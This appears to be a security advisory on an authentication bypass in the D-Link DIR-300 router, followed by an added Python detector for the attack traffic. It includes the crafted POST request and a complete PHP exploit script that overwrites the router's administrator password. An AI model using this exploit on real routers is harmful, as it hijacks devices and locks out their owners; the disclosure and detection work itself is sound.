[intro]

Hello, I found a security bug in the D-Link DIR-300 wireless router. It allows an attacker with network access to the web interface to bypass the authentication mechanism. I reported it to D-Link but they are not replying to my emails. Judging by other D-Link security holes and their status, I think that they won't reply, so I decided to write about it here.

[Technical details]

The control panel script tools_admin.php allows an attacker to change the administrator name, password and other variables without any authorization, by sending a specially crafted HTTP POST request such as:

---cut here---
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.1
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-Length: 130

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
---cut here---

Note that the login credentials in the request (LOGIN_USER=a, LOGIN_PASSWD=b) are bogus: the request is accepted because NO_NEED_AUTH=1 and AUTH_GROUP=0 are sent as ordinary client-supplied form fields alongside the new admin_name and admin_password1, and no existing session or valid password is required.

If an attacker sends this request to the control panel, the administrator username is set to admin with the password "uhOHahEh". The attack is destructive rather than a disclosure: it overwrites the existing administrator password, so the legitimate owner is locked out until the password is changed again.

[Affected]

- All known D-Link DIR-300 firmware versions (i.e. 2.01B1, 1.04, 1.05).
- Other D-Link devices which use the same PHP scripts in the control panel are possibly affected. I'm not able to check it because I don't have devices for tests. I'm counting on you ;->

[Code]

---cut here---
<?php
// D-Link DIR-300 tools_admin.php authentication bypass: sets the admin password.
if(sizeof($argv)!=4) {
    echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
    exit;
}

$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
// Bogus login credentials plus NO_NEED_AUTH=1; the new password is taken from argv[3].
curl_setopt($ch, CURLOPT_POSTFIELDS, "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));

echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
    echo "- Error: could not connect ( http://$argv[1]:$argv[2]/tools_admin.php).\n";
    exit;
} else
    echo "+ request sent\n";
curl_close($ch);

// The router's answer contains "Successfully" when the change was applied.
if(stripos($out,"Successfully")===false) {
    echo "- something went wrong (check the answer - answer.html)!\n";
    $f=fopen("answer.html","w");
    fwrite($f,$out);
    fclose($f);
    exit;
} else
    echo "+ ok, now you can login using l: admin p: $argv[3]\n";
?>
---cut here---

[History]

- Information sent to vendor 07.08.2010
- No response
- Information resent to vendor 07.31.2010
- No response from vendor

[Credits]

Karol Celiński ( Celin )
Pentester/Researcher @ Safe Computing

[Contact]

karol at celin dot pl

[Greetz]

Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski, Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing members.
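For the defensive side of the request described above, the following is an added example (my code, not part of the original advisory and not D-Link's firmware) that flags the bypass pattern in captured HTTP traffic: a POST to tools_admin.php whose client-supplied body carries NO_NEED_AUTH=1 together with a new admin_password1. It parses a raw HTTP/1.1 request, handling both the absolute-form request target used in the advisory's capture and the usual origin-form. The two sample requests are constructed for the example; the field names come from the advisory's request.

```python
"""Added example (not from the advisory or D-Link): detect the DIR-300
tools_admin.php authentication-bypass request pattern in captured HTTP
traffic.  The sample requests at the bottom are constructed for this
example; the field names come from the advisory's request."""
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Form fields from the advisory's request that an unauthenticated client
# should never be able to set.
SUSPICIOUS_FIELDS = {"NO_NEED_AUTH", "AUTH_GROUP", "admin_name", "admin_password1"}


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and form body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # The advisory's capture uses an absolute-form target (proxy style);
    # reduce both that and the usual origin-form to a bare path.
    if target.startswith("http://") or target.startswith("https://"):
        path = urlsplit(target).path
    else:
        path = target.split("?", 1)[0]
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        decoded = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        form = {k: v[0] for k, v in decoded.items()}
    return {"method": method, "path": path, "headers": headers,
            "form": form, "body_len": len(body)}


def detect_bypass(raw: bytes) -> Optional[dict]:
    """Return a finding for a request matching the bypass pattern, else None."""
    req = parse_http_request(raw)
    if req["method"] != "POST" or not req["path"].endswith("/tools_admin.php"):
        return None
    form = req["form"]
    # The tell-tale combination: the client asserts NO_NEED_AUTH=1 itself
    # and supplies new administrator credentials in the same request.
    if form.get("NO_NEED_AUTH") == "1" and "admin_password1" in form:
        return {
            "path": req["path"],
            "fields": sorted(f for f in SUSPICIOUS_FIELDS if f in form),
            "new_admin": form.get("admin_name"),
            "body_len": req["body_len"],
        }
    return None


# Constructed sample traffic: the advisory's exploit request (with a
# Content-Length matching its 130-byte body) and an ordinary login.
EXPLOIT_REQUEST = (
    b"POST http://192.168.1.1:80/tools_admin.php HTTP/1.1\r\n"
    b"Host: 192.168.1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 130\r\n"
    b"\r\n"
    b"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+"
    b"&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh"
)

NORMAL_LOGIN = (
    b"POST /tools_admin.php HTTP/1.1\r\n"
    b"Host: 192.168.1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 69\r\n"
    b"\r\n"
    b"ACTION_POST=LOGIN&LOGIN_USER=admin&LOGIN_PASSWD=secret&login=+Log+In+"
)

if __name__ == "__main__":
    for name, raw in (("exploit", EXPLOIT_REQUEST), ("normal", NORMAL_LOGIN)):
        print(name, detect_bypass(raw))
```

Run against a proxy log or reassembled TCP stream, the detector reports the path, the suspicious fields present and the administrator name being set; a normal login to the same script, which carries only the LOGIN_* fields, is not flagged.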